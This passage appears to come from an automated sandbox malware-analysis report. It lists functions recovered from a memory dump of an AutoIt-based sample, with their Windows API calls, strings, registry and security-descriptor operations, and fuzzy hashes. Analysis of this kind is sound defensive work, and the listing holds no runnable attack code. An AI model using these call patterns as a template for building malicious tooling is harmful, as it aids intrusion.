GetSysColor.USER32(00000011), ref: 00DE7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DE7471
SelectObject.GDI32(?,00000000), ref: 00DE7482
SetBkColor.GDI32(?,00000000), ref: 00DE748B
SelectObject.GDI32(?,?), ref: 00DE7498
InflateRect.USER32(?,000000FF,000000FF), ref: 00DE74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DE74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 00DE74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DE752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DE7554
InflateRect.USER32(?,000000FD,000000FD), ref: 00DE7572
DrawFocusRect.USER32(?,?), ref: 00DE757D
GetSysColor.USER32(00000011), ref: 00DE758E
SetTextColor.GDI32(?,00000000), ref: 00DE7596
DrawTextW.USER32(?,00DE70F5,000000FF,?,00000000), ref: 00DE75A8
SelectObject.GDI32(?,?), ref: 00DE75BF
DeleteObject.GDI32(?), ref: 00DE75CA
SelectObject.GDI32(?,?), ref: 00DE75D0
DeleteObject.GDI32(?), ref: 00DE75D5
SetTextColor.GDI32(?,?), ref: 00DE75DB
SetBkColor.GDI32(?,?), ref: 00DE75E5

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: d646eae50d50d9cf9c7baea5851761ff4d0ac5b5c89325fb3b36d49c61a21a64
Instruction ID: 5e07a09daafb8d9fc3541932f2e89ddc7277444b713d4f67820a2d6a11febf69
Opcode Fuzzy Hash: d646eae50d50d9cf9c7baea5851761ff4d0ac5b5c89325fb3b36d49c61a21a64
Instruction Fuzzy Hash: DE616C72900358AFDF01AFA4DC89EAEBFB9EB08320F155115F915EB2A1D7709941DFA0

Function 00DE0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00DE1128
GetDesktopWindow.USER32 ref: 00DE113D
GetWindowRect.USER32(00000000), ref: 00DE1144
GetWindowLongW.USER32(?,000000F0), ref: 00DE1199
DestroyWindow.USER32(?), ref: 00DE11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DE11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DE121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00DE1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00DE1245
IsWindowVisible.USER32(00000000), ref: 00DE12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00DE12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00DE12D0
GetWindowRect.USER32(00000000,?), ref: 00DE12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 00DE130E
GetMonitorInfoW.USER32(00000000,?), ref: 00DE1328
CopyRect.USER32(?,?), ref: 00DE133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 00DE13AA

Strings

tooltips_class32, xrefs: 00DE11E6
0, xrefs: 00DE10D3
(, xrefs: 00DE131B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 89e124cf4b17560030bf92cef19304b24139dfe40470dfbd50cf73780ac4a1eb
Instruction ID: 975eb0a8ef27ff3eb7ee3b019bb636f7b4aaaf0496d227da7930439ce085f6eb
Opcode Fuzzy Hash: 89e124cf4b17560030bf92cef19304b24139dfe40470dfbd50cf73780ac4a1eb
Instruction Fuzzy Hash: 98B18971604381AFDB14EF65C885B6ABBE4FF84350F04891CF9999B2A1D731E845CBA2

Function 00DE0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DE02E5
_wcslen.LIBCMT ref: 00DE031F
_wcslen.LIBCMT ref: 00DE0389
_wcslen.LIBCMT ref: 00DE03F1
_wcslen.LIBCMT ref: 00DE0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DE04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DE0504

Part of subcall function 00D6F9F2: _wcslen.LIBCMT ref: 00D6F9FD

Part of subcall function 00DB223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DB2258
Part of subcall function 00DB223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DB228A

Strings

GETTEXT, xrefs: 00DE03EC, 00DE0407
DESELECT, xrefs: 00DE059C
GETITEMCOUNT, xrefs: 00DE0316, 00DE0337
SELECTCLEAR, xrefs: 00DE052D
SELECTINVERT, xrefs: 00DE057E
SELECT, xrefs: 00DE0548
SELECTALL, xrefs: 00DE0515
VIEWCHANGE, xrefs: 00DE0675
GETSUBITEMCOUNT, xrefs: 00DE0384, 00DE039F
GETSELECTED, xrefs: 00DE05E1
FINDITEM, xrefs: 00DE0627
GETSELECTEDCOUNT, xrefs: 00DE0470, 00DE048B
ISSELECTED, xrefs: 00DE04DD

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 958b8c0cdf675d436dc555be7c3ce37176b5b73a0bd3f49a2d42659f89afa9f9
Instruction ID: 8ab266f312ef54cde2265acf77a7a04b2f1e20c0d4f2239fb36b7e48b44de6df
Opcode Fuzzy Hash: 958b8c0cdf675d436dc555be7c3ce37176b5b73a0bd3f49a2d42659f89afa9f9
Instruction Fuzzy Hash: 7BE1CF312082818FCB14EF25C55196EBBE1FFC8714B18495DF896AB2A1DB70ED85CBB1

Function 00D68891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D68968
GetSystemMetrics.USER32(00000007), ref: 00D68970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D6899B
GetSystemMetrics.USER32(00000008), ref: 00D689A3
GetSystemMetrics.USER32(00000004), ref: 00D689C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D689E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D689F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D68A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D68A3C
GetClientRect.USER32(00000000,000000FF), ref: 00D68A5A
GetStockObject.GDI32(00000011), ref: 00D68A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00D68A81

Part of subcall function 00D6912D: GetCursorPos.USER32(?), ref: 00D69141
Part of subcall function 00D6912D: ScreenToClient.USER32(00000000,?), ref: 00D6915E
Part of subcall function 00D6912D: GetAsyncKeyState.USER32(00000001), ref: 00D69183
Part of subcall function 00D6912D: GetAsyncKeyState.USER32(00000002), ref: 00D6919D

SetTimer.USER32(00000000,00000000,00000028,00D690FC), ref: 00D68AA8

Strings

AutoIt v3 GUI, xrefs: 00D68A20

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 284cbd47df262de6540081b6e6cb6b55004431f15075c5eeca7d1de681f94813
Instruction ID: 0d77b372f3a29a1545c38ef851804961c0362e6c847d5e93ca1ebdb4c2e37230
Opcode Fuzzy Hash: 284cbd47df262de6540081b6e6cb6b55004431f15075c5eeca7d1de681f94813
Instruction Fuzzy Hash: 04B14971A00209DFDB14DFA8DC85BAA7BB5FB48314F184229FA15EB290DB74E941CF61

Function 00DB0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
Part of subcall function 00DB10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
Part of subcall function 00DB10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
Part of subcall function 00DB10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DB0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DB0E29
GetLengthSid.ADVAPI32(?), ref: 00DB0E40
GetAce.ADVAPI32(?,00000000,?), ref: 00DB0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DB0E96
GetLengthSid.ADVAPI32(?), ref: 00DB0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DB0EB5
HeapAlloc.KERNEL32(00000000), ref: 00DB0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DB0EDD
CopySid.ADVAPI32(00000000), ref: 00DB0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DB0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DB0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DB0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F6E
HeapFree.KERNEL32(00000000), ref: 00DB0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F7E
HeapFree.KERNEL32(00000000), ref: 00DB0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F8E
HeapFree.KERNEL32(00000000), ref: 00DB0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00DB0FA1
HeapFree.KERNEL32(00000000), ref: 00DB0FA8

Part of subcall function 00DB1193: GetProcessHeap.KERNEL32(00000008,00DB0BB1,?,00000000,?,00DB0BB1,?), ref: 00DB11A1
Part of subcall function 00DB1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DB0BB1,?), ref: 00DB11A8
Part of subcall function 00DB1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DB0BB1,?), ref: 00DB11B7

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: f0f107197e312bd5b257b7774384528c8d8d77879b9b51c7ce04d337fd20f209
Instruction ID: 400a8d99782d6bc8b305448e014f451f80147dc668c1e48ad5ab68e9a43a3795
Opcode Fuzzy Hash: f0f107197e312bd5b257b7774384528c8d8d77879b9b51c7ce04d337fd20f209
Instruction Fuzzy Hash: 03713C71A0430AEBDB209FA4DC45BEFBBB8BF09350F184155F91AE6251D7719905CB70

Function 00DDC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00DECC08,00000000,?,00000000,?,?), ref: 00DDC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DDC5A4
_wcslen.LIBCMT ref: 00DDC5F4
_wcslen.LIBCMT ref: 00DDC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DDC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DDC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DDC84D
RegCloseKey.ADVAPI32(?), ref: 00DDC881
RegCloseKey.ADVAPI32(00000000), ref: 00DDC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DDC960

Strings

REG_BINARY, xrefs: 00DDC913
REG_QWORD, xrefs: 00DDC8C3
REG_MULTI_SZ, xrefs: 00DDC6F5
REG_EXPAND_SZ, xrefs: 00DDC5CD
REG_DWORD, xrefs: 00DDC804
REG_SZ, xrefs: 00DDC644

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: e6d135d0364ea93a5ca0141a2b5b2641d80af784acd0428ad4b145aec5cd7bf0
Instruction ID: 859e216c1dc3ee4c9e516cead424e6f3e834ee7006bf65ee7169d4f19077a3eb
Opcode Fuzzy Hash: e6d135d0364ea93a5ca0141a2b5b2641d80af784acd0428ad4b145aec5cd7bf0
Instruction Fuzzy Hash: 481268356142019FDB14DF14C891E2AB7E5EF88725F18885DF88A9B3A2DB31FC45CBA1

Function 00DE091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DE09C6
_wcslen.LIBCMT ref: 00DE0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DE0A54
_wcslen.LIBCMT ref: 00DE0A8A
_wcslen.LIBCMT ref: 00DE0B06
_wcslen.LIBCMT ref: 00DE0B81

Part of subcall function 00D6F9F2: _wcslen.LIBCMT ref: 00D6F9FD

Part of subcall function 00DB2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DB2BFA

Strings

GETTEXT, xrefs: 00DE0C97
CHECK, xrefs: 00DE0A85, 00DE0AA0
ISCHECKED, xrefs: 00DE0CE1
GETTOTALCOUNT, xrefs: 00DE09F2, 00DE0A17
COLLAPSE, xrefs: 00DE0B01, 00DE0B1C
GETITEMCOUNT, xrefs: 00DE0C1E
EXPAND, xrefs: 00DE0BF8
GETSELECTED, xrefs: 00DE0C4E
UNCHECK, xrefs: 00DE0D3E
SELECT, xrefs: 00DE0D11
EXISTS, xrefs: 00DE0B7C, 00DE0B97

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: d5662bda753f13d697b48a2c4cd1d4a911d9fb49c1f517814fbf21e096387304
Instruction ID: a940261031210e2802a837dd760f0c63977fa025990ed5da48b57e706ca30381
Opcode Fuzzy Hash: d5662bda753f13d697b48a2c4cd1d4a911d9fb49c1f517814fbf21e096387304
Instruction Fuzzy Hash: 58E1AE312087818FCB14EF25C45196ABBE1FF98314B18895DF896AB362D770ED85CBB1

Function 00DDC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
_wcslen.LIBCMT ref: 00DDC9F1
_wcslen.LIBCMT ref: 00DDCA68
_wcslen.LIBCMT ref: 00DDCA9E
_wcslen.LIBCMT ref: 00DDCAF9
_wcslen.LIBCMT ref: 00DDCB2F
_wcslen.LIBCMT ref: 00DDCB7F

Strings

HKEY_USERS, xrefs: 00DDCBDF
HKCR, xrefs: 00DDCB29, 00DDCB2E
HKEY_CURRENT_CONFIG, xrefs: 00DDCB79, 00DDCB7E
HKEY_CLASSES_ROOT, xrefs: 00DDCAF3, 00DDCAF8
HKCU, xrefs: 00DDCBCE
HKLM, xrefs: 00DDCA98, 00DDCA9D
HKCC, xrefs: 00DDCBAC
HKEY_LOCAL_MACHINE, xrefs: 00DDCA62, 00DDCA67
HKU, xrefs: 00DDCBF0
HKEY_CURRENT_USER, xrefs: 00DDCBBD

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 776c782057da52feda84552c75ad20d10b4a92d9d83111ec164f6c6c494e87b8
Instruction ID: d9a6b57e1e77be1e2f893d0cf74ff46de12344e76285bd364940db5d9d81afe6
Opcode Fuzzy Hash: 776c782057da52feda84552c75ad20d10b4a92d9d83111ec164f6c6c494e87b8
Instruction Fuzzy Hash: AC71D53262056B8BCB20DE6CCD515BE33A1ABA0754F19252BFC95A7384E631CD85C7B0

Function 00DE833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DE835A
_wcslen.LIBCMT ref: 00DE836E
_wcslen.LIBCMT ref: 00DE8391
_wcslen.LIBCMT ref: 00DE83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DE83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DE5BF2), ref: 00DE844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DE8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DE84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DE8501
FreeLibrary.KERNEL32(?), ref: 00DE850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DE851D
DestroyIcon.USER32(?,?,?,?,?,00DE5BF2), ref: 00DE852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DE8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DE8555

Strings

.dll, xrefs: 00DE83AB
.icl, xrefs: 00DE8368
.exe, xrefs: 00DE8388

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 8bde118d8c1c19b4ec64747a4854570b9039fa660f9b99ac6deccc17ecd3be33
Instruction ID: 72595e7b58b654cddaa654bad388957887a496b921aa3e90f041af0b3d045eac
Opcode Fuzzy Hash: 8bde118d8c1c19b4ec64747a4854570b9039fa660f9b99ac6deccc17ecd3be33
Instruction Fuzzy Hash: 1561CE71540745BAEB14EF65CC81BBE77A8FB04B21F104609F919EA1D1EF74A980DBB0

Function 00D57778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#include, xrefs: 00D57847
#pragma compile, xrefs: 00D577D3
#include-once, xrefs: 00D5782F
', xrefs: 00D95169
Bad directive syntax error, xrefs: 00D9519A
#cs, xrefs: 00D57873, 00D578C5
#requireadmin, xrefs: 00D577FF
#ce, xrefs: 00D578ED
#OnAutoItStartRegister, xrefs: 00D57817
Cannot parse #include, xrefs: 00D95279
#comments-start, xrefs: 00D5785F, 00D578B1
", xrefs: 00D95153
#notrayicon, xrefs: 00D577E7
Unterminated group of comments, xrefs: 00D9528C
#comments-end, xrefs: 00D578D9

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 9e63c00580ede96479a4e740b10f75da006bc1ed5518057916cfef059c9007d8
Instruction ID: 9321446d3bade7f7f509917f995ae808591408aa9ec44d4dc25b6ad9af8b6762
Opcode Fuzzy Hash: 9e63c00580ede96479a4e740b10f75da006bc1ed5518057916cfef059c9007d8
Instruction Fuzzy Hash: 23811971A40605BBDF11AF60FC42FAE37A4EF15301F244024FC05AA196EB71DA19C7B1

Function 00DB5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00DB5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DB5A40
SetWindowTextW.USER32(?,?), ref: 00DB5A57
GetDlgItem.USER32(?,000003EA), ref: 00DB5A6C
SetWindowTextW.USER32(00000000,?), ref: 00DB5A72
GetDlgItem.USER32(?,000003E9), ref: 00DB5A82
SetWindowTextW.USER32(00000000,?), ref: 00DB5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DB5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DB5AC3
GetWindowRect.USER32(?,?), ref: 00DB5ACC
_wcslen.LIBCMT ref: 00DB5B33
SetWindowTextW.USER32(?,?), ref: 00DB5B6F
GetDesktopWindow.USER32 ref: 00DB5B75
GetWindowRect.USER32(00000000), ref: 00DB5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DB5BD3
GetClientRect.USER32(?,?), ref: 00DB5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00DB5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DB5C2F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
